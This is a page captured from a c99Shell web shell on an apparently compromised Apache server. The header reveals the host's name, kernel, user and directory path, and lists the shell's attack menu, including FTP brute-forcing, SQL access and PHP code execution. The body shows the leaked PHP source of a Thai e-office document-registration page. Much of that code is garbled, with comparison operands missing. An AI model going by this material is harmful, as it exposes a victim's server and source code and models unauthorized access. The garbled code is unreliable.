!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mistk/mistk/mistk/eoffice/admin/   drwxr-xr-x
Free 50.78 GB of 127.8 GB (39.73%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     editRegisDoc.php (28.5 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include_once "template.php";
include_once 
"../class/clsTable.php";
include_once 
"../class/clsDepartment.php";
include_once 
"../class/clsPerson.php";
include_once 
"../link/function.php";
include_once 
"../link/functionshow.php";
include_once 
"../class/clsDocLinePosition.php";
include_once 
"../class/clsDocLineConfig.php";
include_once 
"../class/clsReceiveSendType.php";
include_once 
"../class/clsDocType.php";
include_once 
"../class/clsDocSpeedLevel.php";
include_once 
"../class/clsDocSecreLevel.php";
include_once 
"../class/clsDocattatchesTmp.php";
include_once 
"../class/clsDocuments.php";
include_once 
"../class/clsDocattatches.php";
include_once 
"../class/clsDocReceiveSend.php";
include_once 
"funct.php";
include_once 
"../link/keyThai.php";
include_once 
"../class/clsSysConfig.php";

$oC = new clsConnection($GLOBALS['DBHOST'], $GLOBALS['DBNAME_EOFFICE'], $GLOBALS['DBUSER_EOFFICE'], $GLOBALS['DBPASS_EOFFICE']);


$oDP = new Department($oC);
$oDP2 = new Department($oC);
$oDP3 = new Department($oC);
$oPS = new person($oC);
$oDlc = new DocLineConfig($oC);
$oDlc2 = new DocLineConfig($oC);
$oDlp = new docLinePosition($oC);
$oDlp2 = new docLinePosition($oC);
$oRSt = new receiveSendType($oC);
$oDt = new doctype($oC);
$oDt2 = new doctype($oC);
$oDsl = new DocSpeedLevel($oC);
$oDcl = new DocSecretLevel($oC);
$oDtmp = new DocattatchesTmp($oC);
$oDoc = new Documents($oC);
$oDatt = new Docattatches($oC);
$oRs = new DocReceiveSend($oC);
$oSys = new sysConfig($oC);
$MaxDocGroup=$oDP->SearchMaxDocGroup();
$InputThai=$oSys->SearchByInputThai();
if(
$DLCID && $one_position!="1"){ include_once "selectposition.php";
?>

<?
    $oDlc
->SearchByKey($DLCID); $oDlc->GetRecord(); 
    
$oDoc->SearchByKey($DocID); $oDoc->GetRecord(); 
    
$oRs->SearchByKey($DrsID); $oRs->GetRecord(); 
?>
<html>
<head>
<script language="javascript" src="../source/calendarDateInput.js"></script>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="../source/style.css" rel="stylesheet" type="text/css">
</head>
<body>
<table  width="100%"  align="center">
<tr><td >
<fieldset>
      <legend><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="regisDoc.php">ลงทะเบียนใหม่/เสนอหนังสือ</a>
      <img src="../picture/ico3.gif" width="10" border="0" align="absmiddle">ข้อมูลทะเบียนหนังสือ</font>
    </font></legend><br>
        <form name="ff"  METHOD="POST" action="processRegisterDoc.php" enctype="multipart/form-data">
      <table align="center" width="95%" >
        <tr>
          <td width="68%" height="25" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_19"]; ?>">
            <font color="<?php echo $GLOBALS["COLOR_FONT_1"]; ?>" size="3"><strong> 
            &nbsp;ข้อมูลทะเบียนหนังสือ: </strong></font> 
            <font color="<?php echo $GLOBALS["COLOR_FONT_8"]; ?>" size="3"><strong>
            <?   if($RsID==1){    
                        echo 
$oRSt->SearchShowRsName(1); 
                    }else if(
$RsID==2){   
                        echo 
$oRSt->SearchShowRsName(2); 
                    }else if(
$RsID==4){  
                        echo 
$oRSt->SearchShowRsName(4); 
                    }else if(
$RsID==5){  
                        echo 
$oRSt->SearchShowRsName(5); 
                    }
            
?>
            </strong></font>
            &nbsp; <font color="<?php echo $GLOBALS["COLOR_FONT_1"]; ?>" size="3"><strong> 
            &nbsp;ชนิดหนังสือ: </strong></font>
            <font color="<?php echo $GLOBALS["COLOR_FONT_8"]; ?>" size="3"><strong>
              <? $oDt->SearchByKey($DtID);
                     
$oDt->GetRecord();
                     echo 
$oDt->DtName;
            
?>
            </strong></font>
            <input name="RsID" type="hidden" value="<?php echo $RsID?>">
            <input name="DtID" type="hidden" value="<?php echo $DtID?>">
                     </td>
    </tr>
      </table>
      <table width="95%" border="0" align="center" cellpadding="0" cellspacing="1" bordercolor="#DADADA" style="border-collapse:collapse">
      <tr><td>&nbsp;</td></tr>
    <? if($DtID==|| $DtID==|| $DtID==|| $DtID==14){?>  
     <tr ><td width="21%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong>เลขทะเบียน<? echo ShowNameRSDoc2($RsID);?></strong></td>
            <td width="0%" align="center"><strong>:</strong></td>
            <td><input name="DocTypeNo" type="text" style="" size="25" disabled value="<?php echo a2th($oDoc->DocTypeNo);?>" onKeyPress="if(event.keyCode==39){  alert('ระบบไม่สามารถบันทึกตัวอักษรนี้ได้!!'); return false;}else{     event.keyCode=KeyfontThai(event.keyCode,'<? echo $InputThai?>'); return event.keyCode;  }"></td>
    </tr>
    <? ?><input name="DocTypeNo" type="hidden" value="<?php echo $oDoc->DocTypeNo;?>">
     <tr ><td width="21%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong><? echo ShowNameDocNo($DtID); ?></strong></td>
             <td width="0%" align="center"><strong>:</strong></td>
            <td><? if($useMainDocNo==""){  $useMainDocNo=$oDoc->useMainDocNo;  } ?>
            <? if($RsID=="1"){ ?>    
            <input name="DocNo" type="text" maxlength="50" size="25" value="<? $insertDocNo=1;   if($DocNo==""){   if($oDoc->DocNo!=""){  echo $oDoc->DocNo; }  }else{  if($DocNo!=""){  echo a2th($DocNo); }  } ?>" onKeyPress="if(event.keyCode==39){  alert('ระบบไม่สามารถบันทึกตัวอักษรนี้ได้!!'); return false;}else{     event.keyCode=KeyfontThai(event.keyCode,'<? echo $InputThai?>'); return event.keyCode;  }">
            <? }else{?>
            <input name="DocNo" type="text" maxlength="50" size="25" value="<? echo a2th(ShowEditDocNo($RsID,$DtID,$oDlc->deptId,$DocfCir,$oDoc->DocTypeNo,$useMainDocNo)); ?>" disabled onKeyPress="if(event.keyCode==39){  alert('ระบบไม่สามารถบันทึกตัวอักษรนี้ได้!!'); return false;}else{     event.keyCode=KeyfontThai(event.keyCode,'<? echo $InputThai?>'); return event.keyCode;  }">
            <input name="DocNo" type="hidden" value="<? echo a2th(ShowEditDocNo($RsID,$DtID,$oDlc->deptId,$DocfCir,$oDoc->DocTypeNo,$useMainDocNo)); ?>">
            <? ?>
            <? if($RsID=="2"){ ?> <input name="useMainDocNo" type="checkbox" value="Y" onClick='return showDocNomain();' <?  if($oDoc->useMainDocNo =="Y"){   echo "checked"; } ?>>&nbsp;ใช้ที่หนังสือ&nbsp;<? echo a2th($oSys->sysDocNo); ?><?  ?>
            </td>
    </tr>
     <tr ><td width="21%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong><? echo ShowNameDate2($DtID); ?></strong></td>
             <td width="0%" align="center"><strong>:</strong></td><td>
            <? if($DocDate==""){  
                             if(
$oDoc->DocDate!="" && $oDoc->DocDate!="0000-00-00"){ ?> 
                                        <script>DateInput('DocDate', true, 'DD/MM/YYYY','<?php echo splitDateDb($oDoc->DocDate,"/");?>');</script>
                <?      }else{  ?><script>DateInput('DocDate', true, 'DD/MM/YYYY','<?php echo getNowDateFw2();?>');</script><? ?>
            <? }else{ 
                         if(
$DocDate!="" && $DocDate!="0000-00-00"){ ?> 
                                        <script>DateInput('DocDate', true, 'DD/MM/YYYY','<?php echo $DocDate;?>');</script>
                <?      }else{  ?><script>DateInput('DocDate', true, 'DD/MM/YYYY','<?php echo getNowDateFw2();?>');</script><? 
                   } 
?>
            </td>
    </tr>
     <? //if($DtID!=13){ ?>
      <tr ><td width="21%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>" >&nbsp;&nbsp;<strong><? echo ShowNameSubject($DtID); ?></strong></td>
            <td width="0%" align="center"><strong>:</strong></td><td ><input name="DocSubject" type="text" style="" size="70" maxlength="255" value="<? if($DocSubject==""){  if($oDoc->DocSubject!=""){ echo  a2th($oDoc->DocSubject);  }}else{  if($DocSubject!=""){ echo  a2th($DocSubject);  }  }?>" onKeyPress="if(event.keyCode==39){  alert('ระบบไม่สามารถบันทึกตัวอักษรนี้ได้!!'); return false;}else{     event.keyCode=KeyfontThai(event.keyCode,'<? echo $InputThai?>'); return event.keyCode;  }"></td>
    </tr>
    <? //} ?>
    <? if($DtID==|| $DtID==||  $DtID==14 || $DtID==13){?>  
      <tr ><td width="21%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong><? echo ShowNameFrom($DtID); ?></strong></td>
              <td width="0%" align="center"><strong>:</strong></td>
            <td ><input name="DocFrom" type="text" style="" size="70" maxlength="255" value="<? if($DocFrom==""){    if($oDoc->DocFrom!=""){ echo  a2th($oDoc->DocFrom);  } }else{  if($DocFrom!=""){ echo  a2th($DocFrom);  }  } ?>"    <?  if($RsID=="2" || $DtID=="13"){ ?> disabled<?   ?> onKeyPress="if(event.keyCode==39){  alert('ระบบไม่สามารถบันทึกตัวอักษรนี้ได้!!'); return false;}else{     event.keyCode=KeyfontThai(event.keyCode,'<? echo $InputThai?>'); return event.keyCode;  }">
            <?  if($RsID=="2" || $DtID=="13"){  $checkNameFrom=1?> <input name="DocFrom" type="hidden" value="<? if($DocFrom==""){   if($oDoc->DocFrom!=""){ echo  $oDoc->DocFrom;  } }else{  if($DocFrom!=""){ echo  $DocFrom;  }  } ?>"><? ?>
            </td>
       </tr>
    <? ?>
    <? if($DtID=="3" && $RsID=="4"){?>
    <tr ><td width="21%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong>จาก</strong></td>
              <td width="0%" align="center"><strong>:</strong></td>
            <td >&nbsp;<? echo searchDeptDlcID($DLCID); ?><input name="DocFrom" type="hidden" value="<? echo searchDeptDlcID($DLCID); ?>"></td>
      </tr>
    <? }  ?>
    <? if($DtID==13){?>  
      <tr ><td width="21%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong>ชื่อผู้ได้รับการรับรอง</strong></td>
              <td width="0%" align="center"><strong>:</strong></td>
            <td ><input name="CertificatePs" type="text" style="" size="70" maxlength="255" value="<? if($CertificatePs==""){   if($oDoc->CertificatePs!=""){   echo $oDoc->CertificatePs; } }else{ if($CertificatePs!=""){   echo $CertificatePs; }  }?>" onKeyPress="if(event.keyCode==39){  alert('ระบบไม่สามารถบันทึกตัวอักษรนี้ได้!!'); return false;}else{     event.keyCode=KeyfontThai(event.keyCode,'<? echo $InputThai?>'); return event.keyCode;  }"></td>
       </tr>
    <? ?>
    <? if($DtID==|| $DtID==2  || $DtID==14 || $DtID==3){?>
       <tr ><td width="21%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong><? if($DtID==3){   echo "เรียน"; }else{  echo "ถึง"; } ?></strong></td>
                   <td width="0%" align="center"><strong>:</strong></td>
            <td >
            <? if($DocfCir==""){ 
                        if(
$oDoc->DocfCir =="Y"){ ?>
                            <textarea name="DocTo" cols="70" rows="2" onKeyPress="if(event.keyCode==39){  alert('ระบบไม่สามารถบันทึกตัวอักษรนี้ได้!!'); return false;}else{     event.keyCode=KeyfontThai(event.keyCode,'<? echo $InputThai?>'); return event.keyCode;  }"><?  if($oDoc->DocTo!=""){   echo $oDoc->DocTo; }?></textarea>    
                <? }else{  ?>
                            <input name="DocTo" type="text" style="" size="70" maxlength="255" <?  if($RsID=="1"){ ?>value="<? echo a2th($GLOBALS["COLLEGENAME2"]); ?>" disabled<?  }else{    if($oDoc->DocTo!=""){  ?> value="<? echo $oDoc->DocTo?><? }  } ?> onKeyPress="if(event.keyCode==39){  alert('ระบบไม่สามารถบันทึกตัวอักษรนี้ได้!!'); return false;}else{     event.keyCode=KeyfontThai(event.keyCode,'<? echo $InputThai?>'); return event.keyCode;  }">
              <? 
                  }else{  
                        if(
$DocfCir=="Y"){ ?>
              <textarea name="textarea" cols="70" rows="2" onKeyPress="if(event.keyCode==39){  alert('ระบบไม่สามารถบันทึกตัวอักษรนี้ได้!!'); return false;}else{     event.keyCode=KeyfontThai(event.keyCode,'<? echo $InputThai?>'); return event.keyCode;  }"><?  if($DocTo==""){ if($oDoc->DocTo!=""){   echo $oDoc->DocTo; }}else{ if($DocTo!=""){   echo a2th($DocTo); } }?></textarea> 
              <? }else{  ?>
              <input name="DocTo" type="text" style="" size="70" maxlength="255" <?  if($RsID=="1"){  $checkDocTo=1?>value="<?  if($DocTo==""){ if($oDoc->DocTo!=""){   echo $oDoc->DocTo; }}else{ if($DocTo!=""){   echo a2th($DocTo); } }?>" disabled<?  }else{   ?> value="<?  if($DocTo==""){ if($oDoc->DocTo!=""){   echo $oDoc->DocTo; }}else{ if($DocTo!=""){   echo a2th($DocTo); } }?><?  ?> onKeyPress="if(event.keyCode==39){  alert('ระบบไม่สามารถบันทึกตัวอักษรนี้ได้!!'); return false;}else{     event.keyCode=KeyfontThai(event.keyCode,'<? echo $InputThai?>'); return event.keyCode;  }">
                 <? }?>
                <? ?>
          <? if(($DtID==|| $DtID==2) && $RsID=="2"){?>&nbsp;<input name="DocfCir" type="checkbox" value="Y" onClick='return showDoc1();' <?  if($oDoc->DocfCir =="Y"){   echo "checked"; } ?>>&nbsp;<strong>ส่งเวียน</strong><? ?>
          <?  if($RsID=="1"){ ?> <input name="DocTo" type="hidden" value="<?php echo a2th($GLOBALS["COLLEGENAME2"]); ?>"><? ?>
            </td>        
          </tr>
    <? }?>
    <? if(($DtID==|| $DtID==2) && ($RsID=="2" || $RsID=="1")){?>
    <tr ><td width="21%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong>อ้างถึง</strong></td>
                   <td width="0%" align="center"><strong>:</strong></td><td><input name="DocRef" type="text" style="" size="70" maxlength="255"  value="<? if($DocRef!=""){ 
            echo 
a2th($DocRef);  
      }else{   
              if(
$DocNoShow=="" && $DocSubjectShow=="" && $DocDateShow==""){
                echo 
$oDoc->DocRef;
            }else{
                if(
$DocNoShow!=""){ 
                        echo 
a2th($DocNoShow); 
                }   
                if(
$DocSubjectShow!=""){ 
                        echo 
a2th($DocSubjectShow); 
                } 
                if(
$DocDateShow !=""){ 
                        echo 
" ".abbreDate(splitDateDb2($DocDateShow ,'/'));
                 } 
            }
        }
?>" onKeyPress="if(event.keyCode==39){  alert('ระบบไม่สามารถบันทึกตัวอักษรนี้ได้!!'); return false;}else{     event.keyCode=KeyfontThai(event.keyCode,'<? echo $InputThai?>'); return event.keyCode;  }">
            <? if($RsID=="2"){ 
                     
$d=ShowEditDocNo($RsID,$DtID,$oDlc->deptId,$DocfCir,$oDoc->DocTypeNo,$useMainDocNo);
                     if(
$checkNameFrom==1){ $fname=$GLOBALS["COLLEGENAME2"]; }
            
?>
            <a  style="cursor:pointer;" onClick="editDocRef1('<? echo $d?>','<? echo $fname;?>','<? echo $DocID?>','<? echo $useMainDocNo?>')"><img src="../picture/search.gif" alt="ค้นหา"  border="0" ></a>
            <? }else if($RsID=="1"){ 
                    if(
$checkDocTo==1){ $d=$GLOBALS["COLLEGENAME2"]; }
            
?>
            <a  style="cursor:pointer;" onClick="editDocRef2('<? echo $d?>','<? echo $DocID?>','<? echo $useMainDocNo?>')"><img src="../picture/search.gif" alt="ค้นหา"  border="0" ></a>
            <? ?>        
                </td>
    </tr>
    
    <tr ><td width="21%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong>สิ่งที่ส่งมาด้วย</strong></td>
                   <td width="0%" align="center"><strong>:</strong></td><td><input name="DocOther" type="text" style="" size="70" maxlength="255" value="<? if($DocOther==""){ if($oDoc->DocOther!=""){   echo $oDoc->DocOther; } }else{ if($DocOther!=""){   echo a2th($DocOther); } }?>" onKeyPress="if(event.keyCode==39){  alert('ระบบไม่สามารถบันทึกตัวอักษรนี้ได้!!'); return false;}else{     event.keyCode=KeyfontThai(event.keyCode,'<? echo $InputThai?>'); return event.keyCode;  }"></td>
    </tr>
    <? ?>
    <? if($DtID==&& $RsID=="4"){
                
$oDlc2->SearchByKey($DLCID); $oDlc2->GetRecord(); 
                
$oDlp2->SearchByKey($oDlc2->DlpID);  $oDlp2->GetRecord();
                if(
$oDlp2->DlpPID!="0"){ 
                    
$DlcPS2=$DLCID;
                 }else{
                    
$DlcPS2=$oDlc2->SearchDlc2($oDlc2->DlcSeq,$oDlp2->DlpPID,$oDlc2->deptId);
                }
    
?>
    <tr ><td width="21%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong>อ้างถึงหนังสือเพื่อตอบกลับ</strong></td>
                   <td width="0%" align="center"><strong>:</strong></td><td><input name="DocRefAns" type="text" style="" size="70" maxlength="255"  value="<? if($DocRefAns!=""){ 
            echo 
a2th($DocRefAns);  
      }else{   
              if(
$DocNoShow=="" && $DocSubjectShow=="" && $DocDateShow==""){
                echo 
$oDoc->DocRefAns;
            }else{
                if(
$DocNoShow!=""){ 
                        echo 
a2th($DocNoShow); 
                }    
                if(
$DocSubjectShow!=""){ 
                        echo 
a2th($DocSubjectShow); 
                }
                if(
$DocDateShow !=""){ 
                        echo 
" ".abbreDate(splitDateDb2($DocDateShow ,'/'));
                 } 
            }
        }
?>" disabled>
<input name="DocRefAns" type="hidden" value="<? if($DocRefAns!=""){ 
            echo 
a2th($DocRefAns);  
      }else{   
              if(
$DocNoShow=="" && $DocSubjectShow==""  && $DocDateShow==""){
                echo 
$oDoc->DocRefAns;
            }else{
                if(
$DocNoShow!=""){ 
                        echo 
a2th($DocNoShow); 
                }   
                if(
$DocSubjectShow!=""){ 
                        echo 
a2th($DocSubjectShow); 
                } 
                if(
$DocDateShow !=""){ 
                        echo 
" ".abbreDate(splitDateDb2($DocDateShow ,'/'));
                 } 
            }
        }
?>">
            <a  style="cursor:pointer;" onClick="editDocRefAns('<? echo $d?>','<? echo $DocID?>','<? echo $DLCID?>','<? echo $DlcPS2;  ?>','<? echo $useMainDocNo?>')"><img src="../picture/search.gif" alt="ค้นหา"  border="0" ></a>
                </td>
    </tr>
    <? ?>
    <? if($DtID==|| $DtID==|| $DtID==|| $DtID==14){?> 
    <tr ><td width="21%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong>ชั้นตวามเร็ว</strong></td>
                   <td width="0%" align="center"><strong>:</strong></td>
            <td> 
              <select name="DslID" >
                      <? $oDsl->RSDocSpeedLevel();
                            while(
$oDsl->GetRecord()){?>
                      <option value="<? echo $oDsl->DslID;?><? if($DslID==""){ if($oDoc->DslID==$oDsl->DslID){ echo "selected";    } }else{  if($DslID==$oDsl->DslID){ echo "selected"; } }?>><? echo $oDsl->DslName?></option>
                      <? ?>
                    </select></td></tr>
    <tr ><td width="21%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong>ชั้นความลับ</strong></td>
                   <td width="0%" align="center"><strong>:</strong></td><td>
                <select name="DclID" >
                      <? $oDcl->RSDocSecretLevel();
                            while(
$oDcl->GetRecord()){?>
                      <option value="<? echo $oDcl->DclID;?><? if($DclID==""){ if($oDoc->DclID==$oDcl->DclID){ echo "selected";    } }else{  if($DclID==$oDcl->DclID){ echo "selected"; } }?>><? echo $oDcl->DclName?></option>
                      <? ?>
                    </select></td>
    </tr>
    <? ?>
    <tr ><td width="21%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong>หมายเหตุ</strong></td>
                   <td width="0%" align="center"><strong>:</strong></td>
            <td> 
              <textarea name="DocShortDesc" cols="70" rows="4" onKeyPress="if(event.keyCode==39){  alert('ระบบไม่สามารถบันทึกตัวอักษรนี้ได้!!'); return false;}else{     event.keyCode=KeyfontThai(event.keyCode,'<? echo $InputThai?>'); return event.keyCode;  }"><? if($DocShortDesc==""){   if($oDoc->DocShortDesc!=""){ echo $oDoc->DocShortDesc;  } }else{  if($DocShortDesc!=""){ echo a2th($DocShortDesc);  } } ?></textarea></td></tr>
    <tr >
            <td width="21%" height="24">&nbsp;&nbsp;</td>
                   <td width="0%" align="center">&nbsp;</td>
            <td>
                <? $oDt2->SearchByKey($DtID); $oDt2->GetRecord();  ?>
                <input name="endDoc" type="checkbox" value="Y" <?  //if($oDt2->forRegis=="Y" || ($RsID=="2" && ($DtID=="1" || $DtID=="2"))){  echo "checked disabled";}else{  if($endDoc==""){    if($oDoc->endDoc=="Y"){ echo "checked"; } }else{  if($endDoc=="Y"){ echo "checked"; }  } }?><?  if($endDoc==""){    if($oDoc->endDoc=="Y"){ echo "checked"; } }else{  if($endDoc=="Y"){ echo "checked"; }  } ?>>
              &nbsp;<strong>ยุติหนังสือ</strong>
              <? //if($oDt2->forRegis=="Y" || ($RsID=="2" && ($DtID=="1" || $DtID=="2"))){  ?><!--input name="endDoc" type="hidden" value="Y"--> <? //} ?>
              <? if(($RsID=="1" || $RsID=="4") && ($DtID=="1" || $DtID=="2" || $DtID=="3")){  ?>
              <input name="DrsSendToPs" type="checkbox" value="Y" <?  if($DrsSendToPs==""){    if($oDoc->sendToPs=="Y"){ echo "checked"; } }else{  if($DrsSendToPs=="Y"){ echo "checked"; }  }?>>
              &nbsp;<strong>ส่งด่วน (ส่งถึงบุคคลทันที)</strong><? ?>
              </td>
    </tr>
    <tr><td>&nbsp;</td></tr>
        <tr><td colspan="3" align="center">
        <table width="98%" >  
    <tr><td><font color="<?php echo $GLOBALS["COLOR_FONT_2"]; ?>" size="3"><strong><img src="../picture/official_letter.gif" alt=""  border="0" > แฟ้มหนังสือ</strong></font><br><hr color="#000099"></td></tr> 
    <tr>
            <td width="79%"><table width="100%" align="left"><tr><td width="60%">
            <? //------------table upload file-------------------------  ?>
            <table width="95%" border=1 cellpadding="0" cellspacing="0" bordercolor="#6CABF9" style="border-collapse:collapse">
                <tr>
                  <td width="246" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_20"]; ?>">
                  <font size="2" color="<?php echo $GLOBALS["COLOR_FONT_2"]; ?>">
                  &nbsp;<img src="../picture/attach_ico.gif" alt=""  border="0" >&nbsp;แฟ้มที่เกี่ยวข้อง&nbsp;<? $countAllDoc=$oDtmp->CountDocDlcID($DLCID)+$oDatt->CountDocByDocID($oDoc->DocID);  echo a2th($countAllDoc); ?>&nbsp;รายการ</font></td>
                </tr>
                <tr> 
                  <td height="68">
                  <? $oDatt->SearchByDocID($DocID);
                        while(
$oDatt->GetRecord()){  $c++;  $pathfile="../documents/".$oDatt->DaUpFileName;
                
?>
                &nbsp;<a href="<? echo $pathfile ?>" target="_blank"><img src="../picture/allregistered_ico.gif" alt="เปิดดูแฟ้มหนังสือ"  border="0"  style="cursor:pointer;" ></a>&nbsp;
                <img src="../picture/delete1.gif" alt="ลบแฟ้มหนังสือ"  border="0" style="cursor:pointer;"  onClick="return showDoc31('<? echo $oDatt->DaID?>');" >&nbsp;
                <?    echo $c.".&nbsp;".$oDatt->DaFileName."<br>";    } ?>
                  <br></td>
                </tr>    
              </table>
              </td><td width="40%"><table width="227" height="77" border=1 cellpadding="0" cellspacing="0" style="border-collapse:collapse" bordercolor="#6CABF9">
                <tr>
                        <td width="234" height="75"  bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_20"]; ?>">
                        <font size="2" color="<?php echo $GLOBALS["COLOR_FONT_2"]; ?>">
                        &nbsp;คลิ๊กที่ปุ่ม 
                          "Browse.." เพื่อเลือกแฟ้ม จากนั้น<br>&nbsp;คลิ๊กที่ปุ่ม "เพิ่มแฟ้ม" 
                          เพื่อเพิ่มแฟ้มเข้าในรายการ 
                          <input id="fileupload" name="fileupload" type="file">
              &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
              &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
               <input id="btnUpload" type="submit" value="เพิ่มแฟ้ม" onClick='return showDoc2();'>
                <input type="hidden" name="method" value="<? echo $method?>"></font>
                  </td>
                </tr>
              </table>
                </td></tr>
                <?
                            $oSys
->RSsysConfig();
                            
$oSys->GetRecord();
                            
$oSys->filesizebyte;
                            
$sizefileM=($oSys->filesizebyte/1024/1024);
                
?>
                <tr><td>&nbsp;</td><td><font color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>" size="2">หมายเหตุ***&nbsp;ขนาดแฟ้มไม่เกิน <? echo $sizefileM?> MB<br>
                          <font color="#FFFFFF">หมายเหตุ***</font>&nbsp;ชื่อแฟ้มไม่ควรจะประกอบด้วย 
                          จุด(.)</font></td>
                      </tr></table>
    </td></tr>
    </table>
        </td></tr>
        <tr>
            <td colspan="3">&nbsp;</td>
          </tr>
        <tr >
            <td height="24" colspan="3" align="center">
                <input type="submit" name="registerDoc" value="บันทึกการลงทะเบียน" onClick="return checkFormat('<? echo $insertDocNo?>','<? echo $countAllDoc?>');">
                <input type="button" name="cancel" value="กลับหน้าหลัก" onClick="location.href = 'regisDoc.php?RsID=<? echo $RsID;?>&DtID=<? echo $DtID?>'">
                <input name="DocID" type="hidden" value="<?php echo $DocID?>">
                <input name="DrsID" type="hidden" value="<?php echo $DrsID?>">
                <input name="DlcID" type="hidden" value="<?php echo $DLCID?>">
                <input name="DtmpID" type="hidden" value="<?php echo $DtmpID?>">
                <input name="personId" type="hidden" value="<?php echo $oDlc->personId?>">
                <input name="deptId" type="hidden" value="<?php echo $oDlc->deptId?>">
                <input name="DocGroup" type="hidden" value="<?php echo $MaxDocGroup?>">
                <input name="fDelete" type="hidden" value="<?php echo $oDlc->fDelete?>">
                <? //echo "DocRefAnsID=".$DocRefAnsID."<br>"; 
                      //echo "DocRefAns=".$DocRefAns."<br>";
                
?>
                <?  if($DocRefAnsID=="" && $DocRefAns==""){   $DocRefAnsID=$oDoc->DocRefAnsID;  }else if($DocRefAnsID!="" && $DocRefAns!=""){   $DocRefAnsID=$DocRefAnsID;    }  ?>
                <input name="DocRefAnsID" type="hidden" value="<?php echo $DocRefAnsID?>">
                </td></tr>
        <tr><td colspan="3">&nbsp;</td></tr>
      </table></form>  
</fieldset>  <table width="95%" border="0" align="center">
        <tr> 
          <td width="76" align="left"><font color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>" size="2">&nbsp;<strong>หมายเหตุ 
            : </strong>&nbsp;</font></td>
          <td width="618" align="left"><img src="../picture/allregistered_ico.gif" alt=""  border="0" > 
            <font color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>" size="2">คลิกเพื่อเปิดดูแฟ้มหนังสือ </font></td>
        </tr>
            <tr> 
          <td width="76">&nbsp;</td>
          <td width="618" align="left"><img src="../picture/delete1.gif" alt=""  border="0" > 
            <font color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>" size="2">คลิกเพื่อลบแฟ้มหนังสือที่ไม่ต้องการ </font></td>
        </tr></table>
</td>
</tr>
</table>
</body>
</html>
<? }else{ include_once "unselectposition.php"; } ?>
<script language="javascript">
function showDoc1(){
    document.ff.method.value="selectCir_edit";
    document.ff.submit();
}
function showDocNomain(){
    document.ff.method.value="showDocNomain_edit";
    document.ff.submit();
}
function showDoc2(){
    if(document.ff.fileupload.value==""){
        alert("กรุณา Browse เลือกเแฟ้ม");
        return false ;
    }
    document.ff.method.value="uploadfile";
    document.ff.submit();
}
function showDoc31(j){
        var agree=confirm("คุณต้องการลบแฟ้มหนังสือแน่นอนใช่หรือไม่ ?");
        if (agree){
            document.ff.method.value="deletefile";
            document.ff.DtmpID.value = j;
            document.ff.submit();
            return true;
        }else{
            return false ;
        }
}
function checkFormat(q,r){
        if(q==1){
            if(document.ff.DocNo.value == ""){
                alert("กรุณากรอกที่หนังสือ");
                document.ff.DocNo.focus();
                return false;
            }
        }
        //if(r==0){
                //alert("กรุณาแนบแฟ้มหนังสือ");
                //return false;
        //}
        var agree=confirm("คุณต้องการบันทึกการลงทะเบียนแน่นอนใช่หรือไม่ ?");
        if (agree){
            document.ff.method.value="editRegisterDoc";
            return true;
        }else{
            return false ;
        }
}
function editDocRef1(d,fname,Docid,s){ 
    docDate=document.ff.DocDate.value;
    DocSubject=document.ff.DocSubject.value;
    DocTo=document.ff.DocTo.value;
    DocOther=document.ff.DocOther.value;
    DslID=document.ff.DslID.value;
    DclID=document.ff.DclID.value;
    DocShortDesc=document.ff.DocShortDesc.value;
    DocRef=document.ff.DocRef.value;
    if(document.ff.endDoc.checked==true){  endDoc="Y"; }else{ endDoc=""; }
